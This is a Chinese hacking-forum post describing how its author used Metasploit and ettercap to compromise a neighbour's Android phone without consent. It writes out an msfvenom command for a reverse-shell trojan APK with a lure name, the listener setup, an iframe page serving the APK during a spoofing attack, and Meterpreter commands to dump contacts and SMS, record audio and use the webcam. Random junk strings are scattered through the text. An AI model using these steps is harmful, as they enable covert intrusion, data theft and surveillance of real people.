找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 2646|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

. b! N9 {+ y; g6 r7 w 五、msf+ettercap入侵邻居安卓手机 , P3 O$ f& R2 |. R

( {& X0 Z( @, C! m: y

! r5 d- L% U! ]; H! K 首先启动msf 2 C9 f) n$ V# e& R6 z' p- O! C

- l) g$ H7 i# K5 m. V( t( n

{& y* x- g C) {1 g7 L$ I 先用kali生成一个安卓木马,如下命令: 9 \& X. \6 E# B3 y& {

+ X: W1 X" A; r/ W) S+ l8 J

5 q+ c, x( i/ X5 p5 E" ?, A7 X Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk V6 g8 J4 k. k7 G- ^( P( T

c$ j9 W+ D }. P1 R- O

- Z! a! X* ]7 m$ L" w 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 7 r8 y3 F! M" v2 Z& l- o6 F

- u$ N9 W. n% }

# O. C$ b* z/ z% }( N, D 然后进入msf & [/ j3 w+ U l2 \

- Z4 g* \7 O$ G9 L

6 m' H1 A& Y" Q use exploit/multi/handler ( f; G8 h- \& m( ~/ p4 q; u+ n9 o

5 M: q+ ^3 V4 \ T( X3 P1 I

( t" ~: |6 M8 R# E. W) F; D8 [$ c set payload android/meterpreter/reverse_tcp ) y5 c; W3 l7 ?! N

: ~( c+ g/ J$ ~0 q( k1 Z) T

, }9 F- q# P$ f set LHOST 192.168.0.109 //ipkailiip ; I. } l v% R* O: p; v) w

1 `5 x6 J: X ]

/ n0 c: |1 E' F& V* R5 P! e. b) ~ set LPORT 44444 //端口一定要与前面生成的木马的端口一致 # J3 S: i# s4 a8 X# g( f

. v9 y$ |4 v8 f2 p# D0 j5 X5 t% G

) \/ ^( V8 R: i/ Q" f Exploit 6 V0 r* z, e0 f. `+ W6 b- G# V7 V. R

/ i& Z1 s: d8 Y9 t4 ~. d% L9 {8 @

/ j# \ [( j4 P2 X* t3 \3 k, v   0 X6 r: s2 T* W) |; G

# t1 q9 L' [4 a8 t4 z& s$ E) H

4 m, M' |* e+ ~1 H% b$ p8 U# Q/ n: P 下面我们开启ettercap -G ) k* W1 ` E/ ~$ T" y, @

+ ]% {8 e; v5 `# Y \# e4 r

; h! _) O$ g- x+ D 我物理IP 2 c$ X& ~2 [0 c9 w2 H( j. a+ P

1 h! g: `. ]- k! o

$ [2 E( J1 K9 [! r   4 U q; ^6 A$ |" q; L

9 L! I/ `+ J! J

- V( h: x' B5 G2 P, f( G+ M1 c* A 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ' y* h/ J' O/ A8 v- d/ z6 b4 W. D

4 w4 y) K6 ~, S+ \3 r& ], u1 [$ Z$ {

+ s, w1 @% W1 j4 {% T 下面我们来设置一下 . l+ }/ V9 ^1 @0 N

: F+ {9 \) R- R

3 t; N( C; P. [( H7 F* V3 |   ; N2 x( e! y0 j& ]; t) J

6 g; B! G. N" N& o7 c

" K) g$ I& ~+ z5 ~7 I. K 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 7 x+ n% z' V; o1 [

/ c9 `) h/ ~5 |! i# s

8 W( \2 D L6 ^( q; ?; P; W' R   ( P$ d6 r# x0 W. [; ?

/ F* o C2 P# z0 n- S6 @

* ?2 |+ W" x& ]; M |   + f/ j7 {! w8 z n7 C( w

# ]' C9 W, ?6 P$ W+ F* S

/ j( r9 x) ~4 s1 B* U   / H9 a: R" R% [* x5 }: h5 r

7 h y! I2 y0 a# u6 B8 R

: M, Y6 G# w0 ~1 }   ; z. ]' K; v) H; ?4 f

2 o, u( {4 N+ x7 T- z4 X& b

3 l: V8 O, ~2 e   0 r$ Q8 R! b7 A' R; y* N

' B( ]: {: p, A ]

; c2 s; m) O4 A7 Y1 o( S( P   # k, U& T" p1 g. U6 i* o: ^

: H1 h/ L( c/ K, B7 \$ p

$ D" `6 }% o6 K: _3 w   / h5 V3 R% A; z/ M7 u1 ]9 Y3 u* E

; W4 j1 x p& y! c1 j" T

" D9 x2 b4 V. o( X0 ^   8 u8 R" t* k- D# U% ]; W/ H9 h9 ~

+ q2 O) `. B& N. W

7 s3 j0 o4 H8 X" Z   - w8 m9 c( ^1 g1 H W+ E) j# a- {! T2 }- f

( w% F# A* @/ x p3 y, t" |

, U5 l: m/ e9 M) Y8 o( I& v   * z' z& \1 D4 b& L" h

6 }+ q6 S% S2 x; E8 t+ {

! j/ n; _; }6 b+ K   : f0 _, I$ `) Y

. c3 u4 v2 P9 X5 t8 N

" x* N& L- d' _, D( N   , O, |; y+ V6 i9 W$ W

' X! J& t o( ?9 Z" [

7 J1 l- Y' X5 k& f# Q   ) v& _ G; H! k! q) c8 ^

1 G* e4 P& u7 v, A/ ~ Z

* I9 V4 V; f+ b9 [8 a 下面我们开始攻击 6 `. H" h* r+ L5 a, ?# P

j1 H* c1 b- y* @* ^+ J

c2 B/ K6 J9 Z* ~* x   , Z( V6 Z- |7 ]

( y1 I# R$ _( V5 G0 O) h: q6 ^/ @- k

! \. L w1 h- i   / k, ~8 c* K% p1 k& L

4 C+ M5 p+ ~+ ]9 _3 Z3 x2 R

/ h2 }" Y/ m( [& _) t: @8 j   6 @+ C$ j8 z/ ^5 j' _

" ]) r5 Y) d* I& D {# R

) w+ A! {6 j% @) c3 p/ l! `$ v   # I" z/ ^* r! R$ o

7 ~. w, i2 q9 k( _+ q" t

" ]. H- f7 Z, Z0 ^) N5 R+ f   + E2 R8 o, t% q6 b$ L* v4 N

* R+ T1 K/ M% `/ D/ W

5 K( M3 L4 M' j2 P( n 大概过了5分钟多,发现反弹成功了 3 q/ L. W7 u o" l/ ^

( w# h. S6 h, V( }, j( o

% B5 v% t0 R( F; A R3 W) T% M   ' t! S5 x7 M9 j( r

* P0 f6 G$ N" y% ]% h

3 y) d( h* ^" [7 X0 h   % ]6 p" i, q3 Z7 d2 p7 Q

8 \; j; ^0 G9 L/ T' B$ k/ q

2 r1 Q( D4 M0 j/ c8 n   9 C7 X! B ?+ h# `( W! c

1 s& \. t$ x3 ~9 d

* @$ o+ ?8 L m) P& J2 z7 {+ }   6 \5 q+ w! W$ K) J8 \; f

& s) k9 i9 L' d# q9 D

/ o2 f1 w& k& k* k; P1 n, z   B6 V9 K9 r! l) U/ U2 S

$ D/ v8 J2 b. [4 o3 T

* M0 H2 h4 _1 x; W; ^$ C   6 }. {3 ?2 F. g. V/ j. A S

" \% N2 m( \1 D! P

. d% M7 H/ v, y: k6 n ?   $ @* d, p0 ?. O

! E0 W- x* `& Q% w2 @ b2 i; U

1 {! d7 {1 _9 B0 Z/ G! {' Q 执行命令 2 E# v+ _7 i& u0 ?

4 r2 x; Z6 \, a' _( D' |5 w

) H4 a/ U- b' |   1 R4 G. O' J- V; p' _3 ?5 t

3 c) Q. N* E; M6 }" |$ ]# m

& d. A/ F: D0 Z* t5 D4 m3 k: ? dump_contacts    --》这个是导出电话 ) I9 H6 y1 f5 }) G' I

l2 s7 A& G8 [ [ \- J

9 x5 Y7 t% l) i" U1 f$ @ dump_sms --》这个是导出信息 $ ?# f& F/ p( G# B

R+ [, o4 n& M* I. A% d

" D( N" U4 z: I, Z- A! |' ]& c record_mic     Record audio from the default microphone for X seconds 2 Y# O- |: m3 O& Z# Q. @" D$ {

2 A* n0 X9 l" @4 G

. L) C. ^/ o5 e+ u {     webcam_chat    Start a video chat & ^& J% w9 X7 L! f( n( s& K2 q4 L

$ \* }1 i( M- k% n' I

B- c% X, p$ W% p# m" G     webcam_list    List webcams ' P& p. X4 ?2 m# D0 U

) C. M% g+ z3 p

& Z4 H0 W0 I( G4 P     webcam_snap    Take a snapshot from the specified webcam ]! N) @% n7 D$ V1 c8 F

5 b$ N2 p0 h- z' B- ?$ t, ?4 P

7 u% i C* T3 F9 g5 K! h. N webcam_stream  lay a video stream from the specified webcam / ^9 s' r' _7 C% e, D% Y4 \

2 o/ t* ~0 w! T

% x4 }" V6 {8 N8 I   1 F3 Q0 I+ v( b) V2 w% _3 W# o

! U7 ~0 |0 }+ p- ?

0 M3 d9 C Y( C9 k- e   $ [$ N6 |+ a7 C; N$ C6 O

. w: {5 I3 u/ ], l5 N

& ]8 ^+ g4 h$ I 我们打开看一下电话薄, " Z- }7 o4 y. V( | b

& f, G4 A- L/ k

& h! M9 B2 y8 r5 v P- W3 O4 t   . F4 F$ I M4 Q" s* |

% q2 f$ V* E! e% i+ O, ~. Y

4 ^! M# N; o% D; _3 O" v0 P   * n$ `. q' ?5 E; c& {

" [/ C# G& l& A

1 c5 ]* I& r% F   - S/ G" i3 }0 x( I! e: k! T: v

% Y5 {( l9 O+ r Z* V

- k4 l m- @: f6 ^/ o3 T) u9 _2 e   ( u3 [6 A, [$ `( O

% U2 N( ~, v, m: _3 k

( w1 {; W* h: O& S. l   3 \% }/ ?6 a9 Q

$ a. o V6 |3 W% j j* Z

+ G& t# j+ J, Z   : j! c, a9 V2 Z5 }/ K; Z6 z

0 j6 X: H) S1 s4 x+ m' e, I

; l! I9 P# C# W0 a 我们同时欺骗成DroidJack木马,使用方法如图: 6 F" f+ n! X) d* @) r( w7 N2 _+ r, W5 b

: f- S' O+ P% h. Q% l+ Q$ D7 |

. h4 Z- c$ o- C9 p( \4 M. i+ r/ l   1 @/ s; Y7 u5 K. N/ S

7 r' V" w# s6 B3 U

7 v* G3 x: d6 t& J   / B" A: \" C- X

6 J# O( q* S" x7 b1 B

9 @" V' L4 `* T m6 M   ; R8 T- {% @! A' n( C# p! b

$ d& f1 d- j I; h. b, G) e u

% N' r% [8 T- t 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 * J, s o1 c1 J5 ]! p. _

5 f! x$ ^% ^/ v" P* c

m7 X7 b7 f/ I, ^2 ]& V8 K   + a6 G% s' I/ g. @- } y

. d0 u' C; [) {; n3 T5 s9 @

; X* [. D2 U2 l   7 b1 ?6 W9 @( A$ H7 m: l! K; w3 C

4 |9 h9 Z* X" E; O7 ^2 d4 y

% ]: Q) ~ F1 W7 Y   3 S, i9 m5 O! l) U/ a) k

# Y9 ^0 e) t+ P

! d+ J# E* r3 ]- b 6 _% f' c4 h( d

5 |' y7 w' [. T; D2 b! _/ ~0 X+ u

3 n- V- D; |3 S& z w o
% r/ W% T# a4 H1 e

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表